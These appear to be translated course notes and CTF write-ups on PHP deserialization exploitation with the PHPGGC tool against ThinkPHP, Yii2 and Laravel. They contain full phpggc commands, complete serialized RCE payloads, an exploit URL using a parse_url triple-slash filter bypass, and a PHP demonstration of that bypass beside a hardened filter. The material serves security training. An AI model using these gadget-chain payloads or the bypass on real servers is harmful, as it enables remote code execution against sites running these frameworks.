Key points
- PHP deserialization: development-framework projects
- PHP deserialization: payload-generation projects
- PHP deserialization: combined payload-generation project
Xiaodi says the more detailed treatment comes later in the code-audit lessons.
Demo cases
➢ Deserialization gadget-chain projects: PHPGGC & NotSoSecure
NotSoSecure
- Project URL: https://github.com/NotSoSecure/SerializedPayloadGenerator
- Setup: this one is deployed on IIS, i.e. on Windows, so I did not set it up
- Introduction:
  - To exploit deserialization vulnerabilities you have to set up several different tools, such as YSoSerial (Java), YSoSerial.NET, PHPGGC and their prerequisites. DeserializationHelper is a web interface that bundles support for YSoSerial (Java), YSoSerial.Net, PHPGGC and other tools; through the web interface you can generate deserialization payloads for a range of frameworks. These are tools for framework gadget chains; they cannot be used against deserialization code you wrote yourself.
- Includes the following:
  - Java: YSoSerial
  - .NET: YSoSerial.NET
  - PHP: PHPGGC
  - Python: native
PHPGGC
- Project URL: https://github.com/ambionics/phpggc
- Setup: on Linux just download it and run ./phpggc -h to see the usage; it is quite simple
- Introduction:
  - PHPGGC is a library of unserialize() payloads together with a tool to generate them from the command line or programmatically. When you run into deserialization on a site whose code you do not have, or are simply trying to build an exploit, this tool lets you generate the payload without the tedious steps of finding gadgets and chaining them together. It can be seen as the PHP equivalent of frohoff's ysoserial. Gadget chains currently supported by the tool include CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, ThinkPHP, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.
- In CTFs and elsewhere, when exploiting framework deserialization vulnerabilities, writing your own PoC takes far too long; uh, honestly I can't write the PoC myself, it is too complex, so this is where we need the tools
➢ Exploiting framework deserialization: ThinkPHP & Yii & Laravel
BUUCTF [安洵杯 2019] iamthinking
Key point
- ThinkPHP V6.0.X deserialization
Steps
- A routine directory scan finds www.zip; download the source and analyse it
- Analysing the source shows the site is built with ThinkPHP, version 6.0
- In app/controller/index.php the payload parameter is received and unserialized, with a simple filter applied to the URL
- Search for thinkphp directly with phpggc to see whether there is a chain matching this version
- Pick the chain to use and check its syntax; here ThinkPHP/RCE3 is used
- Generate the command to execute according to the syntax
└─# ./phpggc ThinkPHP/RCE4 system 'cat /flag' --url
O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D
- --url URL-encodes the payload and --base64 base64-encodes it; choose whichever you need
- parse_url bypass
  - When parsing a URI of the form http://xxx.com///index.php?payload=cmd, parse_url returns false
- Build the URL and successfully get the flag
http://d1c17b5d-82ae-4025-8682-3c9e40377e27.node4.buuoj.cn:81///public/?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D
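The parse_url bypass used above, as an added PHP example (not from the write-up or from the challenge source): a filter that inspects query values by re-parsing $_SERVER['REQUEST_URI'] with parse_url() is skipped when the request URI begins with ///, because parse_url() returns false for a string that starts with // but carries no host, and the filter is then left with no query to check; the hardened version fails closed and inspects $_GET directly. The filter functions, the shortened payload prefix and the sample URIs are constructed for illustration.

```php
<?php
// Added example, not from the write-up or the challenge source. Shows why a
// filter built on parse_url($_SERVER['REQUEST_URI']) can be skipped: PHP's
// parse_url() returns false for a URI that starts with "//" but has no host,
// e.g. "///public/?payload=O:...", so the filter sees no query at all.

// Weak filter (constructed): blocks query values that look like a serialized object.
function weakFilter(string $requestUri): bool
{
    $parts = parse_url($requestUri);
    // BUG: when parse_url() fails, $parts is false, the query is treated as
    // empty, the loop inspects nothing and the request is allowed through.
    parse_str($parts['query'] ?? '', $query);
    foreach ($query as $value) {
        if (is_string($value) && preg_match('/^O:/i', $value)) {
            return false;
        }
    }
    return true;
}

// Hardened filter: fail closed on an unparsable URI and inspect the parameters
// the application actually reads ($_GET) instead of re-parsing the raw URI.
// The real fix is to stop passing user input to unserialize() at all (or at
// least call it with ['allowed_classes' => false]); this only closes the bypass.
function strictFilter(string $requestUri, array $get): bool
{
    if (parse_url($requestUri) === false) {
        return false;
    }
    foreach ($get as $value) {
        // "O:" introduces a serialized object, "C:" a serialized custom object
        if (is_string($value) && preg_match('/^[OC]:\d+:/i', $value)) {
            return false;
        }
    }
    return true;
}

// Constructed sample requests; the serialized payload is cut down to its prefix.
$payload = 'O:17:"think\model\Pivot":9:{...}';
$normal  = '/public/?payload=' . $payload;
$bypass  = '///public/?payload=' . $payload;
$get     = ['payload' => $payload];

var_dump(parse_url($bypass));           // the parse failure the weak filter ignores
var_dump(weakFilter($normal));          // ordinary request: the weak filter blocks it
var_dump(weakFilter($bypass));          // triple-slash request slips past the weak filter
var_dump(strictFilter($bypass, $get));  // the hardened filter blocks the same request
```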
CTFSHOW deserialization 267: Yii2 deserialization
Weak-password login / source hint leak
- After logging in with the weak password, visit GET: index.php?r=site%2Fabout&view-source
- The source can be viewed; the parameter received for deserialization is code
- Build the payload with the tool
└─# ./phpggc Yii2/RCE1 exec 'cp /fla* tt.txt' --base64
TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NDoiZXhlYyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MTU6ImNwIC9mbGEqIHR0LnR4dCI7aToxO2k6MDt9fX19fX0=
- Pass the code parameter and visit GET: /index.php?r=backdoor/shell&code=
- Visit /tt.txt to get the flag
CTFSHOW deserialization 271: Laravel deserialization
The POST parameter data is received and unserialized; generate the payload with the tool and submit it
./phpggc Laravel/RCE2 system "id" --url
ThinkPHP deserialization chain analysis
A complete analysis of the ThinkPHP vulnerabilities, all as md files, though somewhat hard to follow; not easy reading without a development background.
Thinkphp-All-vuln-main: https://github.com/hughink/Thinkphp-All-vuln
References
All learning material comes from the Xiaodi Security course series:
parse_url summary: https://www.cnblogs.com/tr1ple/p/11137159.html